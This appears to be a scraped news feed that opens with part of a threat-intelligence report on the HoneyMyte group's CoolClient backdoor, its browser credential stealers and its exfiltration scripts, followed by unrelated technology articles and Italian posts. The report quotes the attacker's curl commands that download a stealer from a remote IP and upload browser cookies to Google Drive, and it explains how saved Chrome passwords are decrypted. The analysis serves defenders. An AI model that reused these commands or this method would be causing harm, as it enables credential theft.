A few basic file operations are already supported in the operational commands of the main CoolClient implant, such as listing directory contents and deleting files. However, the dedicated file management plugin provides a full set of file management capabilities.
| Command ID | Action |
| 0x0 | List drives and network resources |
| 0x1 | List files in folder |
| 0x2 | Delete file or folder |
| 0x3 | Create new folder |
| 0x4 | Move file |
| 0x5 | Read file |
| 0x6 | Write data to file |
| 0x7 | Compress file or folder into ZIP archive |
| 0x8 | Execute file |
| 0x9 | Download and execute file using certutil |
| 0xA | Search for file |
| 0xB | Send search result |
| 0xC | Map network drive |
| 0xD | Set chunk size for file transfers |
| 0xF | Bulk copy or move |
| 0x10 | Get file metadata |
| 0x11 | Set file metadata |
RemoteShellS.dll – Remote shell plugin
Based on our analysis of the main implant, the C2 command handler did not implement remote shell functionality. Instead, CoolClient relied on a dedicated plugin to enable this capability. This plugin spawns a hidden cmd.exe process, redirecting standard input and output through pipes, which allows the attacker to send commands into the process and capture the resulting output. This output is then forwarded back to the C2 server for remote interaction.
CoolClient plugin that spawns cmd.exe with redirected I/O and forwards command output to C2
Browser login data stealer
While investigating suspicious ToneShell backdoor traffic originating from a host in Thailand, we discovered that the HoneyMyte threat actor had downloaded and executed a malware sample intended to extract saved login credentials from the Chrome browser as part of their post-exploitation activities. We will refer to this sample as Variant A. On the same day, the actor executed a separate malware sample (Variant B) targeting credentials stored in the Microsoft Edge browser. Both samples can be considered part of the same malware family.
During a separate threat hunting operation focused on HoneyMyte’s QReverse backdoor, we retrieved another variant of a Chrome credential parser (Variant C) that exhibited significant code similarities to the sample used in the aforementioned ToneShell campaign.
The malware was observed in countries such as Myanmar, Malaysia, and Thailand, with a particular focus on the government sector.
The following table shows the variants of this browser credential stealer employed by HoneyMyte.
| Variant | Targeted browser(s) | Execution method | MD5 hash |
| A | Chrome | Direct execution (PE32) | 1A5A9C013CE1B65ABC75D809A25D36A7 |
| B | Edge | Direct execution (PE32) | E1B7EF0F3AC0A0A64F86E220F362B149 |
| C | Chromium-based browsers | DLL side-loading | DA6F89F15094FD3F74BA186954BE6B05 |
These stealers may be part of a new malware toolset used by HoneyMyte during post-exploitation activities.
Initial infection
As part of post-exploitation activity involving the ToneShell backdoor, the threat actor initially executed the Variant A stealer, which targeted Chrome credentials. However, we were unable to determine the exact delivery mechanism used to deploy it.
A few minutes later, the threat actor executed a command to download and run the Variant B stealer from a remote server. This variant specifically targeted Microsoft Edge credentials.
curl hxxp://45.144.165[.]65/BUIEFuiHFUEIuioKLWENFUoi878UIESf/MUEWGHui897hjkhsjdkHfjegfdh/67jksaebyut8seuhfjgfdgdfhet4SEDGF/Tools/getlogindataedge.exe -o "C:\users\[username]\libraries\getloginedge.exe"
Within the same hour that Variant B was downloaded and executed, we observed the threat actor issue another command to exfiltrate the Firefox browser cookie file (cookies.sqlite) to Google Drive using a curl command.
curl -X POST -L -H "Authorization: Bearer ya29.a0Ad52N3-ZUcb-ixQT_Ts1MwvXsO9JwEYRujRROo-vwqmSW006YxrlFSRjTuUuAK-u8UiaQt7v0gQbjktpFZMp65hd2KBwnY2YdTXYAKhktWi-v1LIaEFYzImoO7p8Jp01t29_3JxJukd6IdpTLPdXrKINmnI9ZgqPTWicWN4aCgYKAQ4SARASFQHGX2MioNQPPZN8EkdbZNROAlzXeQ0174" -F "metadata={name :'8059cookies.sqlite'};type=application/json;charset=UTF-8" -F "file=@"$appdata\Mozilla\Firefox\Profiles\i6bv8i9n.default-release\cookies.sqlite";type=application/zip" -k "https://www.googleapis.com/upload/drive/v3/files?uploadType=multipart"
Variant C analysis
Unlike Variants A and B, which use hardcoded file paths, the Variant C stealer accepts two runtime arguments: file paths to the browser’s Login Data and Local State files. This provides greater flexibility and enables the stealer to target any Chromium-based browser such as Chrome, Edge, Brave, or Opera, regardless of the user profile or installation path. An example command used to execute Variant C is as follows:
Jarte.exe "C:\Users\[username]\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\[username]\AppData\Local\Google\Chrome\User Data\Local State"
In this context, the Login Data file is an SQLite database that stores saved website login credentials, including usernames and AES-encrypted passwords. The Local State file is a JSON-formatted configuration file containing browser metadata, with the most important value being encrypted_key, a Base64-encoded AES key. It is required to decrypt the passwords stored in the Login Data database and is also encrypted.
When executed, the malware copies the Login Data file to the user’s temporary directory as chromeTmp.
Function that copies Chrome browser login data into a temporary file (chromeTmp) for exfiltration
To retrieve saved credentials, the malware executes the following SQL query on the copied database:
SELECT origin_url, username_value, password_value FROM logins
This query returns the login URL, stored username, and encrypted password for each saved entry.
Next, the malware reads the Local State file to extract the browser’s encrypted master key. This key is protected using the Windows Data Protection API (DPAPI), ensuring that the encrypted data can only be decrypted by the same Windows user account that created it. The malware then uses the CryptUnprotectData API to decrypt this key, enabling it to access and decrypt password entries from the Login Data SQLite database.
With the decrypted AES key in memory, the malware proceeds to decrypt each saved password and reconstructs complete login records.
Finally, it saves the results to the text file C:\Users\Public\Libraries\License.txt.
Login data stealer’s attribution
Our investigation indicated that the malware was consistently used in the ToneShell backdoor campaign, which was attributed to the HoneyMyte APT group.
Another factor supporting our attribution is that the browser credential stealer appeared to be linked to the LuminousMoth APT group, which has previously been connected to HoneyMyte. Our analysis of LuminousMoth’s cookie stealer revealed several code-level similarities with HoneyMyte’s credential stealer. For example, both malware families used the same method to copy targeted files, such as Login Data and Cookies, into a temporary folder named ChromeTmp, indicating possible tool reuse or a shared codebase.
Code similarity between HoneyMyte’s saved login data stealer and LuminousMoth’s cookie stealer
Both stealers followed the same steps: they checked if the original Login Data file existed, located the temporary folder, and copied the browser data into a file with the same name.
Based on these findings, we assess with high confidence that HoneyMyte is behind this browser credential stealer, which also has a strong connection to the LuminousMoth APT group.
Document theft and system information reconnaissance scripts
In several espionage campaigns, HoneyMyte used a number of scripts to gather system information, conduct document theft activities and steal browser login data. One of these scripts is a batch file named 1.bat.
1.bat – System enumeration and data exfiltration batch script
The script starts by downloading curl.exe and rar.exe into the public folder. These are the tools used for file transfer and compression.
Batch script that downloads curl.exe and rar.exe from HoneyMyte infrastructure and executes them for file transfer and compression
It then collects network details and downloads and runs the nbtscan tool for internal network scanning.
Batch script that performs network enumeration and saves the results to the log.dat file for later exfiltration
During enumeration, the script also collects information such as stored credentials, the result of the systeminfo command, registry keys, the startup folder list, the list of files and folders, and antivirus information into a file named log.dat. It then uploads this file via FTP to http://113.23.212[.]15/pub/.
Batch script that collects registry, startup items, directories, and antivirus information for system profiling
Next, it deletes both log.dat and the nbtscan executable to remove traces. The script then terminates browser processes, compresses browser-related folders, retrieves FileZilla configuration files, archives documents from all drives with rar.exe, and uploads the collected data to the same server.
Finally, it deletes any remaining artifacts to cover its tracks.
Ttraazcs32.ps1 – PowerShell-based collection and exfiltration
The second script observed in HoneyMyte operations is a PowerShell file named Ttraazcs32.ps1.
Similar to the batch file, this script downloads curl.exe and rar.exe into the public folder to handle file transfers and compression. It collects computer and user information, as well as network details such as the public IP address and Wi-Fi network data.
All gathered information is written to a file, compressed into a password-protected RAR archive and uploaded via FTP.
In addition to system profiling, the script searches multiple drives including C:\Users\Desktop, Downloads, and drives D: to Z: for recently modified documents. Targeted file types include .doc, .xls, .pdf, .tif, and .txt, specifically those changed within the last 60 days. These files are also compressed into a password-protected RAR archive and exfiltrated to the same FTP server.
t.ps1 – Saved login data collection and exfiltration
The third script attributed to HoneyMyte is a PowerShell file named t.ps1.
The script requires a number as a parameter and creates a working directory under D:\temp with that number as the directory name. The number is not related to any identifier. It is simply a numeric label that is probably used to organize stolen data by victim. If the D drive doesn’t exist on the victim’s machine, the new folder will be created in the current working directory.
The script then searches the system for Chrome and Chromium-based browser files such as Login Data and Local State. It copies these files into the target directory and extracts the encrypted_key value from the Local State file. It then uses Windows DPAPI (System.Security.Cryptography.ProtectedData) to decrypt this key and writes the decrypted Base64-encoded key into a new file named Local State-journal in the same directory. For example, if the original file is C:\Users\$username \AppData\Local\Google\Chrome\User Data\Local State, the script creates a new file C:\Users\$username\AppData\Local\Google\Chrome\User Data\Local State-journal, which the attacker can later use to access stored credentials.
PowerShell script that extracts and decrypts the Chrome encrypted_key from the Local State file before writing the result to a Local State-journal file
Once the credential data is ready, the script verifies that both rar.exe and curl.exe are available. If they are not present, it downloads them directly from Google Drive. The script then compresses the collected data into a password-protected archive (the password is “PIXELDRAIN”) and uploads it to pixeldrain.com using the service’s API, authenticated with a hardcoded token. Pixeldrain is a public file-sharing service that attackers abuse for data exfiltration.
Script that compresses data with RAR, and exfiltrates it to Pixeldrain via API
This approach highlights HoneyMyte’s shift toward using public file-sharing services to covertly exfiltrate sensitive data, especially browser login credentials.
Conclusion
Recent findings indicate that HoneyMyte continues to operate actively in the wild, deploying an updated toolset that includes the CoolClient backdoor, a browser login data stealer, and various document theft scripts.
With capabilities such as keylogging, clipboard monitoring, proxy credential theft, document exfiltration, browser credential harvesting, and large-scale file theft, HoneyMyte’s campaigns appear to go far beyond traditional espionage goals like document theft and persistence. These tools indicate a shift toward the active surveillance of user activity that includes capturing keystrokes, collecting clipboard data, and harvesting proxy credential.
Organizations should remain highly vigilant against the deployment of HoneyMyte’s toolset, including the CoolClient backdoor, as well as related malware families such as PlugX, ToneShell, Qreverse, and LuminousMoth. These operations are part of a sophisticated threat actor strategy designed to maintain persistent access to compromised systems while conducting high-value surveillance activities.
Indicators of compromise
CoolClient
F518D8E5FE70D9090F6280C68A95998F libngs.dll
1A61564841BBBB8E7774CBBEB3C68D5D loader.dat
AEB25C9A286EE4C25CA55B72A42EFA2C main.dat
6B7300A8B3F4AAC40EEECFD7BC47EE7C time.dat
CoolClient plugins
7AA53BA3E3F8B0453FFCFBA06347AB34 ServiceMgrS.dll
A1CD59F769E9E5F6A040429847CA6EAE FileMgrS.dll
1BC5329969E6BF8EF2E9E49AAB003F0B RemoteShellS.dll
Browser login data stealer
1A5A9C013CE1B65ABC75D809A25D36A7 Variant A
E1B7EF0F3AC0A0A64F86E220F362B149 Variant B
DA6F89F15094FD3F74BA186954BE6B05 Variant C
Scripts
C19BD9E6F649DF1DF385DEEF94E0E8C4 1.bat
838B591722512368F81298C313E37412 Ttraazcs32.ps1
A4D7147F0B1CA737BFC133349841AABA t.ps1
CoolClient C2
account.hamsterxnxx[.]com
popnike-share[.]com
japan.Lenovoappstore[.]com
FTP server
113.23.212[.]15
Why Diffraction Gratings Create Fourier Transforms
When last we saw [xoreaxeax], he had built a lens-less optical microscope that deduced the structure of a sample by recording the diffraction patterns formed by shining a laser beam through it. At the time, he noted that the diffraction pattern was a frequency decomposition of the specimen’s features – in other terms, a Fourier transform. Now, he’s back with an explanation of why this is, deriving equations for the Fourier transform from the first principles of diffraction (German video, but with auto-translated English subtitles. Beware: what should be “Huygens principle” is variously translated as “squirrel principle,” “principle of hearing,” and “principle of the horn”).
The first assumption was that light is a wave that can be adequately represented by a sinusoidal function. For the sake of simplicity (you’ll have to take our word for this), the formula for a sine wave was converted to a complex number in exponential form. According to the Huygens principle, when light emerges from a point in the sample, it spreads out in spherical waves, and the wave at a given point can therefore be calculated simply as a function of distance. The principle of superposition means that whenever two waves pass through the same point, the amplitude at that point is the sum of the two. Extending this summation to all the various light sources emerging from the sample resulted in an infinite integral, which simplified to a particular form of the Fourier transform.
One surprising consequence of the relation is the JPEG representation of a micrograph of some onion cells. JPEG compression calculates the Fourier transform of an image and stores it as a series of sine-wave striped patterns. If one arranges tiles of these striped patterns according to stripe frequency and orientation, then shades each tile according to that pattern’s contribution to the final image, one gets a speckle pattern with a bright point in the center. This closely resembles the diffraction pattern created by shining a laser through those onion cells.
For the original experiment that generated these patterns, check out [xoreaxeax]’s original ptychographical microscope. Going in the opposite direction, researchers have also used physical structures to calculate Fourier transforms.
youtube.com/embed/zjw9lhaivTY?…
Le disavventure della verità
La verità è un concetto mobile e sfuggente, i cui confini cambiano in relazione alla temperie culturale e all’azione dei soggetti che hanno i mezzi per costruirla e farla accettare.
Già nel V secolo però, Platone metteva in guardia i cittadini di Atene che per instaurare la democrazia bisognava cacciare i retori e i sofisti, che ingannano il popolo con sillogismi, paralogismi, notizie false e inventate.
Ma la società della comunicazione, basata su persuasione e populismo, non è in grado di scacciare i nuovi retori che assumono le vesti di imbonitori e tribuni di un popolo costruito algoritmicamente.
Nel libro «Le disavventure della verità», il filosofo Umberto Galimberti affronta così il tema della verità in un’ottica comparata confrontando Marx, Nietsche e Freud nelle loro pubblicazioni meno note. Ovviamente con riferimento alla Repubblica di Platone e a quello sfortunato che informò i cavernicoli che erano oggetto di un’illusione (disinformazione, diremmo oggi). Lo sfortunato fu bastonato dai cavernicoli per la sua rivelazione.
[…] a differenza dei tempi trascorsi, oggi l’abbondanza delle informazioni, che è il tratto tipico del nostro tempo, ci rende responsabili di ciò che sappiamo e se, per quieto vivere, per noia, per distrazione, per disinteresse, per stanchezza o per assuefazione, non siamo sensibili al problema della verità, di fronte a quel che sappiamo diventiamo irrimediabilmente indifferenti, quando non addirittura immorali.
Oggi, infatti, dobbiamo chiederci che ne è della verità nella nostra epoca caratterizzata dall’incontenibile diffusione dei media, ai quali da ultimo si sono aggiunti i social con le loro vere e false notizie e prese di posizioni, per lo più acritiche, quando non puri sfoghi pulsionali o emotivi. Per affrontare questo tema bisogna liquidare quei luoghi comuni, per non dire idee arretrate che fanno da tacita guida a quasi tutte le riflessioni sui media, secondo le quali l’uomo può usare i mezzi di comunicazione come qualcosa di neutrale rispetto alla sua natura… […]
Al tempo della guerra ibrida, quella che mescola la falsa informazione alle azioni militari, il sabotaggio della verità ci riguarda tutti.
«Le disavventure della verità», Umberto Galimberti, Feltrinelli, 2025
Il momento straussiano
Palantir è il nuovo potere della sorveglianza globale. Anche i Servizi Segreti francesi hanno ammesso di usarne tecnologia e capacità di analisi. E lo fanno pure la Ferrari, Stellantis, il Policlinico Gemelli in Italia.
I software di Palantir sono in uso anche all’esercito israeliano. Il suo board nel 2024 ha tenuto una seduta del consiglio di amministrazione a Tel Aviv in segno di solidarietà dopo l’attacco terroristico del 7 ottobre 2023.
Ma che cos’è Palantir? Palantir è la nuova macchina del potere americano creata da Peter Thiel, il magnate che ha fondato l’azienda prendendone il nome dalla saga del Signore degli Anelli. Palantir è l’occhio che tutto vede e che nella saga consente ai cattivi di intimidire, trovare e punire, non i cattivi, ma i buoni della storia, cioè la famosa compagnia dell’Anello.
Nella prospettiva di Thiel e di Alex Karp, attuale Ceo di Palantir, però è tutto rovesciato. L’occhio che tutto vede, cioè i suoi software Gotham e Foundry, potenziati dal coordinamento di una terza piattaforma, Apollo, e dall’intelligenza artificiale IAP, sono gli strumenti della nuova sorveglianza che sovrintende alla macchina da guerra americana e degli eserciti che se lo possono permettere. Come quello di Israele.
Palantir è una macchina indifferente all’etica e alla morale occidentale e illuministica.
Dopo alcuni servizi giornalistici sappiamo che Palantir, vende dati per fare la guerra. E poi li usa per foraggiare il suo spin off, Anduril, azienda dedicata alla produzione di IA e droni da combattimento.
Ma è solo nel libro «Il momento straussiano» che capiamo perché Peter Thiel, tecnologo, gay, cattolico, conservatore, con Palantir si sia definitivamente sganciato dalla retorica di benessere, progresso e uguaglianza prodotta dall’immaginifica
industria della Silicon Valley negli ultimi 30 anni fino a farla ribaltare nelle sue convinzioni più profonde, un tempo basate sul «don’t be evil» (non fare il male).
Nel libro Thiel lo spiega. E quello che dice fa venire i brividi, affermando che l’Occidente deve farsi rispettare usando la violenza e la deterrenza quali elementi attivi di civilizzazione e di difesa della sua missione teleologica e salvifica del mondo.
Usando cioè i mezzi contrari alla cultura occidentale dei diritti che essa dovrebbero affermare e perseguire.
«Peter Thiel, Il momento straussiano. A cura di Andrea Venanzoni. Liberilibri 2025»
Il ransomware non blocca i server. Blocca il credito: il lato finanziario della cybersecurity
📌 Link all'articolo : redhotcyber.com/post/il-ransom…
C’è questa idea sbagliata, un po’ romantica volendo, per cui il #ransomware è “roba da IT”: qualche #server in crisi, due notti in bianco, poi si riparte e fine…
La realtà, soprattutto per un’azienda quotata o con linee di credito bancarie, è più semplice e più crudele: il #ransomware non cifra solo i file, cifra la fiducia. Quando la fiducia cala, il credito diventa più costoso, più corto e più “capriccioso”.
A cura di Antonio Piovesan
#redhotcyber #news #ransomware #cybersecurity #sicurezzainformatica #malware #attacchinformatici #creditobancario #meritoCreditizio #gestionedelrischio #aziendequotate #banche #finanza #sicurezzadigital
Il ransomware non blocca i server. Blocca il credito: il lato finanziario della cybersecurity
Un attacco ransomware può bloccare i server, ma soprattutto il cash flow. Banche, covenant e rating: ecco l’impatto reale sul credito.Antonio Piovesan (Red Hot Cyber)
Cybersecurity & cyberwarfare reshared this.
securityaffairs.com/187367/mal…
#securityaffairs #hacking
Amnesia RAT deployed in multi-stage phishing attacks against Russian users
A multi-stage phishing campaign targets users in Russia with ransomware and Amnesia RAT using fake business documents as lures.Pierluigi Paganini (Security Affairs)
Cybersecurity & cyberwarfare reshared this.
L’AI non è affidabile come credi: i rischi nascosti dei LLM senza una buona governance
📌 Link all'articolo : redhotcyber.com/post/lai-non-e…
#redhotcyber #news #intelligenzaartificiale #modellilinguistici #cybersecurity #sicurezzainformatica #governancedellai
L’AI non è affidabile come credi: i rischi nascosti dei LLM senza una buona governance
L'adozione di modelli linguistici di grandi dimensioni senza controlli adeguati può esporre a danni legali, finanziari e di reputazione.Silvia Felici (Red Hot Cyber)
Cybersecurity & cyberwarfare reshared this.
🔥 SONO UFFICIALMENTE APERTE LE ISCRIZIONI! 🔥
Sta per partire la Settima Live Class del corso "𝗗𝗔𝗥𝗞 𝗪𝗘𝗕 𝗘 𝗖𝗬𝗕𝗘𝗥 𝗧𝗛𝗥𝗘𝗔𝗧 𝗜𝗡𝗧𝗘𝗟𝗟𝗜𝗚𝗘𝗡𝗖𝗘" – livello intermedio 🚀
📌 Inizio: Domenica 8 Marzo 2026
📌 Posti super limitati (max 14 partecipanti)
✅ Pagina del corso: redhotcyber.com/linksSk2L/acad…
✅ Presentazione del corso del prof. Pietro Melillo : youtube.com/watch?v=9VaQUnTz4J…
✅ Webinar introduttivo di presentazione al corso : youtube.com/watch?v=ExZhKqjuwf…
Per info e iscrizioni: 📱 💬 379 163 8765 ✉️ formazione@redhotcyber.com
#redhotcyber #formazione #cybersecurity #darkweb #cyberthreatintelligence #ethicalhacking #infosec #intelligence #liveclass #corsi #cybercrime
Live Class Dark Web e Cyber Threat Intelligence - Red Hot Cyber
Vuoi conoscere il darkweb e disporre degli strumenti per accedervi in sicurezza, effettuare ricerche e comprendere i concetti di cyber threat intelligence (CTI)? Questo corso fa per te.Red Hot Cyber
Ricardo Antonio Piana likes this.
Cybersecurity & cyberwarfare reshared this.
Difesa attiva e hack back: il labirinto legale della cybersecurity
📌 Link all'articolo : redhotcyber.com/post/difesa-at…
#redhotcyber #news #cybersecurity #sicurezzainformatica #legittimadifesa #attacchiinformatici #contrattacco
Difesa attiva e hack back: il labirinto legale della cybersecurity
La difesa attiva contro i cyber attacchi può trasformarsi in reato. Analisi dei rischi penali dell’hack back, della legittima difesa digitalePaolo Galdieri (Red Hot Cyber)
Cybersecurity & cyberwarfare reshared this.
The History of Tandem Computers
If you are interested in historical big computers, you probably think of IBM, with maybe a little thought of Sperry Rand or, if you go smaller, HP, DEC, and companies like Data General. But you may not have heard of Tandem Computers unless you have dealt with systems where downtime was unacceptable. Printing bills or payroll checks can afford some downtime while you reboot or replace a bad board. But if your computer services ATM machines, cash registers, or a factory, that’s another type of operation altogether. That was where Tandem computers made their mark, and [Asianometry] recounts their history in a recent video that you can watch below.
When IBM was king, your best bet for having a computer running nonstop was to have more than one computer. But that’s pricey. Computers might have some redundancy, but it is difficult to avoid single points of failure. For example, if you have two computers with a single network connection and a single disk drive. Then failures in the network connection or the disk drive will take the system down.
The idea started with an HP engineer, but HP wasn’t interested. Tandem was founded on the idea of building a computer that would run continuously. In fact, the name was “the non-stop.” The idea was that smaller computer systems could be combined to equal the performance of a big computer, while any single constituent system failing would still allow the computer to function. It was simply slower. Even the bus that tied the computers together was redundant. Power supplies had batteries so the machines would keep working even through short power failures.
Not only does this guard against failures, but it also allows you to take a single computer down for repair or maintenance without stopping the system. You could also scale performance by simply adding more computers.
Citibank was the first customer, and the ATM industry widely adopted the system. The only issue was that Tandem programs required special handling to leverage the hardware redundancy. Competitors were able to eat market share by providing hardware-only solutions.
The changing computer landscape didn’t help Tandem, either. Tandem was formed at a time when computer hardware was expensive, so using a mostly software solution to a problem made sense. But over time, hardware became both more reliable and less expensive. Software, meanwhile, got more expensive. You can see where this is going.
The company flailed and eventually would try to reinvent itself as a software company. Before that transition could work or fail, Compaq bought the company in 1997. Compaq, of course, would also buy DEC, and then it was all bought up by HP — oddly enough, where the idea for Tandem all started.
There’s a lot of detail in the video, and if you fondly remember Tandem, you’ll enjoy all the photos and details on the company. If you need redundancy down at the component level, you’ll probably need voting.
youtube.com/embed/SSSB7ZTSXH4?…
210 - Self-made. La parola che fa sparire i vantaggi - Marco Camisani Calzolari
Self-made. La parola che fa sparire i vantaggi. Il sogno americano. Uno parte da solo, ha una buona idea, poi arrivano i miliardi. Quante volte abbiamo visto le porte dei garage di Apple, Google, Amazon, Disney, Mattel.Web Staff MCC (Marco Camisani Calzolari)
Cybersecurity & cyberwarfare reshared this.
🤖 Tracking strings detected and removed!
🔗 Clean URL(s):
camisanicalzolari.it/210-self-…
❌ Removed parts:
?utm_source=dlvr.it&utm_medium=mastodon
210 - Self-made. La parola che fa sparire i vantaggi - Marco Camisani Calzolari
Self-made. La parola che fa sparire i vantaggi. Il sogno americano. Uno parte da solo, ha una buona idea, poi arrivano i miliardi. Quante volte abbiamo visto le porte dei garage di Apple, Google, Amazon, Disney, Mattel.Web Staff MCC (Marco Camisani Calzolari)
E che il phishing abbia inizio! Microsoft corre ai ripari per una zero-day già sfruttata in Office
📌 Link all'articolo : redhotcyber.com/post/e-che-il-…
#redhotcyber #news #microsoft #office #vulnerabilita #zeroday #patch #aggiornamento #sicurezza #cybersecurity
E che il phishing abbia inizio! Microsoft corre ai ripari per una zero-day già sfruttata in Office
Microsoft rilascia patch non programmate per Microsoft Office per risolvere una vulnerabilità zero-day già sfruttata in attacchi informatici.Redazione RHC (Red Hot Cyber)
Cybersecurity & cyberwarfare reshared this.
securityaffairs.com/187354/hac…
#securityaffairs #hacking
Dormakaba flaws allow to access major organizations’ doors
Researchers found over 20 flaws in Dormakaba access systems that could let attackers remotely unlock doors at major organizations.Pierluigi Paganini (Security Affairs)
Cybersecurity & cyberwarfare reshared this.
33.000 tonnellate di ferro… e un’indagine dove AIS e log sono trappole da cyber intelligence
📌 Link all'articolo : redhotcyber.com/post/33-000-to…
#redhotcyber #news #guardiaDifinanza #sanzioni #materialeFerroso #trafficoIllegale #agenziaDelleDogane
33.000 tonnellate di ferro… e un’indagine dove AIS e log sono trappole da cyber intelligence
Operazione Guardia di Finanza a Brindisi: come l'uso di fonti aperte e dati tecnici sostiene il contrasto alla criminalità organizzata e al terrorismo.Roberto Villani (Red Hot Cyber)
Cybersecurity & cyberwarfare reshared this.
ServiceNow sotto attacco: come un’email può spalancare le porte della tua azienda
📌 Link all'articolo : redhotcyber.com/post/serviceno…
#redhotcyber #news #cybersecurity #hacking #servicenow #intelligenzaartificiale #vulnerabilita #furtoinformazioni
ServiceNow sotto attacco: come un’email può spalancare le porte della tua azienda
Scoperta una vulnerabilità critica nella piattaforma AI di ServiceNow che permette agli aggressori di impersonare utenti e manipolare agenti AI.Redazione RHC (Red Hot Cyber)
Cybersecurity & cyberwarfare reshared this.
One Hundred Years Of Telly
Today marks an auspicious anniversary which might have passed us by had it not been for [Diamond Geezer], who reminds us that it’s a hundred years since the first public demonstration of television by John Logie Baird. In a room above what is today a rather famous Italian coffee shop in London’s Soho, he had assembled a complete mechanical TV system that he demonstrated to journalists.
Television is one of those inventions that owes its genesis to more than a single person, so while Baird was by no means the only one inventing in the field, he was the first to demonstrate a working system. With mechanical scanning and just 30 lines, it’s hardly HD or 4K, but it does have the advantage of being within the reach of the constructor.
Perhaps the saddest thing about Baird and his system is that while he was able to attract the interest of the BBC in it, when the time came for dedicated transmissions at a higher resolution, his by then partly mechanical system could not compete and he faded into relative obscurity. Brits instead received EMI’s 405 line system, which persisted until the very start of the 1980s, and eventually the German PAL colour system in the late 1960s.
So head on down to Bar Italia if you can to raise a coffee to his memory, and should you wish to have a go at Baird-style TV for yourself, then you may need to print yourself a disk.
Header image: Matt Brown, CC BY 2.0.
Create a Tiny Telephone Exchange with an Analog Telephone Adapter
An analog telephone adapter (ATA), or FXS gateway, is a device that allows traditional analog phones to be connected to a digital voice-over-IP (VoIP) network. In addition to this, you can even create a local phone exchange using just analog phones without connecting to a network as [Playful Technology] demonstrates in a recent video.
The ATA used in the video is the Grandstream HT802, which features one 10/100 Mbps Ethernet port and two RJ11 FXS ports for two POTS phones, allowing for two phones to be directly connected and configured using their own profiles.
By using a multi-FXS port ATA in this manner, you essentially can set up your own mini telephone exchange, with a long run of Cat-3 possible between an individual phone and the ATA. Use of the Ethernet port is necessary just once to configure the ATA, as demonstrated in the video. The IP address of the ATA is amusingly obtained by dialing *** on a connected phone and picking 02 as menu option after which a synthetic voice reads out the number. This IP address gets you into the administration interface.
To configure the ATA as an exchange, the local loopback address is used, along with a dial alias configured in the ‘Dial Plan’ section. This way dialing e.g. 102 gets internally converted to dial the other FXS port. By setting up a similar plan on the other FXS port both phones can call each other, but it’s also possible to auto-dial when you lift the handset off the hook.
The rather hacky configuration ought to make clear that the ATA was not designed to be used in this manner, but if your use case involves this kind of scenario, it’s probably one of the cheaper ways to set up a basic, small phone exchange. There are even ATA models that have more than two ports, opening up more possibilities. Just keep in mind that not every ATA may support this kind of tweaking.
youtube.com/embed/-dD4Xepac8o?…
Restoring a 1924 Frigidaire B-9 Refrigerator Back to Working Condition
Before the refrigerator became a normal part of any kitchen, those with enough money to throw around could get an icebox, which used melting ice to cool food and drinks in a second compartment. As refrigerators became available for sale in the 1920s, this created somewhat awkward transition models, like the 1924 Frigidaire B-9 that [David Allen] recently got offered for a restoration. This was part of the restoration of a 1926 house, which foresaw putting this venerable unit back into operation.
As [David] explains, this refrigerator was still in use until about 1970 when it broke down, and repairs proved tricky. Clearly, the fault wasn’t that severe as [David] got it working again after a number of small repairs and a lot of maintenance. The running unit with its basic elements can be seen purring away in the completion video, with the journey to get there covered in a video series starting with the first episode.
What’s fascinating is that during this aforementioned transition period, the vapor compression electric cooling system was an optional extra, meaning that the basic layout is still that of an icebox. Correspondingly, instead of ice in the ice compartment, you find the low-side float evaporator, with the basement section containing the condensing unit, motor, and compressor. The temperature sensor is also a miracle of simplicity, using bellows that respond to the temperature and thus volume of the evaporator coolant, which trigger a switch that turns on the compressor.
Despite a hundred years having passed since this refrigerator was constructed, at its core it works exactly the same as the unit we have in our kitchens today, albeit with higher efficiency, more electronics, and with the sulfur dioxide refrigerant replaced with something less toxic to us humans.
youtube.com/embed/lieog1_yNCo?…
youtube.com/embed/xICtNFbvEH0?…
When Digital Sovereignty got real
IT'S MONDAY, AND THIS IS DIGITAL POLITICS. I'm Mark Scott, and will be speaking on a webinar hosted by the Knight Georgetown Institute on Jan 28. The topic: how to improve access to social media data to support greater transparency and accountability. You can sign up here (the webinar starts at 11am ET / 5pm CET / 4pm UK).
— Even some of the United States' closest allies are re-evaluating their ties to American tech amid growing concerns about Washington's worldview.
— It's official. ByteDance sold off its US TikTok unit. But does the fire sale actually solve the underlying national security and privacy concerns?
— Many teenagers are OK with a smartphone ban at school. They are less keen on their devices being taken away forever.
Let's get started:
Wendy Nather
in reply to Lorenzo Franceschi-Bicchierai • • •